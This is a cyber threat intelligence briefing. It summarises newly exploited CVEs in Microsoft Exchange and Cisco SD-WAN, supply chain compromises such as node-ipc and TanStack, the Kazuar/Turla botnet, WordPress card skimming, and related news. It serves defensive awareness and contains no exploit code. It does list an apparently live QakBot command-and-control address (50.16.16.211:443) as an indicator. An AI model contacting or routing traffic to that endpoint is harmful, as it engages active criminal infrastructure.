Cyber Threat Briefing
DELTA — CHANGES SINCE LAST BRIEFING
- CISA added CVE-2026-42897 (Microsoft Exchange XSS) to KEV, confirming active exploitation.
- Cisco Catalyst SD-WAN CVE-2026-20182 also added to KEV with exploitation in the wild and an imminent remediation deadline.
- New supply chain compromises reported, including malicious node‑ipc packages and the TanStack Mini Shai-Hulud incident.
- QakBot C2 infrastructure (50.16.16.211:443) remains active.
THREAT LEVEL ASSESSMENT
The overall threat environment remains CRITICAL, driven by active exploitation of Microsoft Exchange (CVE-2026-42897) and Cisco SD‑WAN (CVE-2026-20182), both providing high-value footholds for threat actors. Concurrent supply chain attacks, credential‑stealing malware updates, and ongoing exploitation campaigns targeting WordPress ecosystems elevate systemic risk. The presence of active QakBot command‑and‑control further contributes to a heightened likelihood of compromise across sectors.
CRITICAL VULNERABILITIES
| CVE | Product | CVSS | Status | Impact |
|---|---|---|---|---|
| CVE-2020-37228 | iDS6 DSSPro Digital Signage System | 9.8 | Not in KEV | Authentication bypass enabling brute-force attacks via CAPTCHA retrieval. |
| CVE-2020-37239 | libbabl 0.1.62 | 9.8 | Not in KEV | Memory corruption risk enabling bypass of double‑free protections. |
| CVE-2021-47952 | python jsonpickle 2.0.0 | 9.8 | Not in KEV | Remote code execution via malicious JSON deserialization. |
| CVE-2026-42897 | Microsoft Exchange Server | Not Published | KEV — Actively Exploited | XSS leading to arbitrary code execution via crafted emails. |
ACTIVE EXPLOITS & KEV
| CVE | Product | Added | Remediation Due | Notes |
|---|---|---|---|---|
| CVE-2026-42897 | Microsoft Exchange Server | 2026‑05‑15 | 2026‑05‑29 | Confirmed exploitation; XSS enabling code execution. |
| CVE-2026-20182 | Cisco Catalyst SD‑WAN Controller | 2026‑05‑14 | 2026‑05‑17 | Authentication bypass used to obtain admin access. |
MALWARE & THREAT ACTORS
QakBot: One active C2 endpoint remains online (50.16.16.211:443, first seen 2025‑12‑30). QakBot operations continue to support credential harvesting, lateral movement, and ransomware staging. Its persistence highlights ongoing botnet resilience despite previous takedown operations.
Kazuar / Turla: Recent reporting confirms the Kazuar backdoor has evolved into a modular P2P botnet supporting stealth and long-term persistence. Capabilities include distributed command relays and multi‑stage data collection modules, enhancing Turla’s operational resilience.
node‑ipc supply chain compromise: Multiple malicious releases have been identified, embedding credential-stealing functionality targeting developer secrets. This elevates risk for CI/CD pipelines and enterprise development environments.
Funnel Builder exploitation: Active exploitation of WordPress Funnel Builder plugin vulnerabilities continues, injecting JavaScript skimmers into WooCommerce checkout pages to harvest payment card data.
CYBER NEWS DIGEST
Microsoft Exchange zero‑day actively exploited (Bleeping Computer / The Hacker News). Microsoft confirmed ongoing attacks leveraging CVE‑2026‑42897, where crafted emails trigger XSS leading to remote code execution on on‑prem Exchange servers. Mitigations have been published, but patching is urgent due to the KEV designation.
Cisco SD‑WAN authentication bypass exploited for admin access (Dark Reading / The Hacker News). CVE‑2026‑20182, a maximum‑severity flaw, is used in live attacks enabling full administrative control of SD‑WAN controllers. CISA added the vulnerability to KEV with a hard remediation deadline of 2026‑05‑17.
node‑ipc npm package compromised to steal credentials (Bleeping Computer / The Hacker News). Newly published versions of node‑ipc were found embedding malware designed to exfiltrate sensitive developer credentials. The attack increases supply chain exposure across JavaScript ecosystems.
TanStack Mini Shai‑Hulud supply chain attack affects OpenAI employee devices (The Hacker News). Two internal OpenAI employee devices were compromised due to malicious upstream packages. No production systems or user data were affected, but the event underscores the expanding attack surface in software supply chains.
Canvas education platform breached and extorted (Krebs on Security). A major data extortion attack has disrupted education across the U.S., affecting school districts and universities. Attackers accessed systems tied to critical digital coursework infrastructure.
Russian-linked groups deploy updated Kazuar P2P botnet (Bleeping Computer / The Hacker News). Secret Blizzard/Turla shifted Kazuar into a P2P architecture enabling stealthier persistence and better evasion of takedown attempts, reinforcing long-term espionage capabilities.
Funnel Builder WordPress plugin actively exploited for credit card theft (Bleeping Computer / The Hacker News). Attackers inject malicious JavaScript into WooCommerce checkout pages, indicating an ongoing e‑commerce skimming campaign affecting numerous retailers.
Feds dismantle multiple IoT botnets (Krebs on Security). A coordinated international operation has disrupted four major botnets responsible for large-scale DDoS attacks, impacting more than three million compromised IoT devices.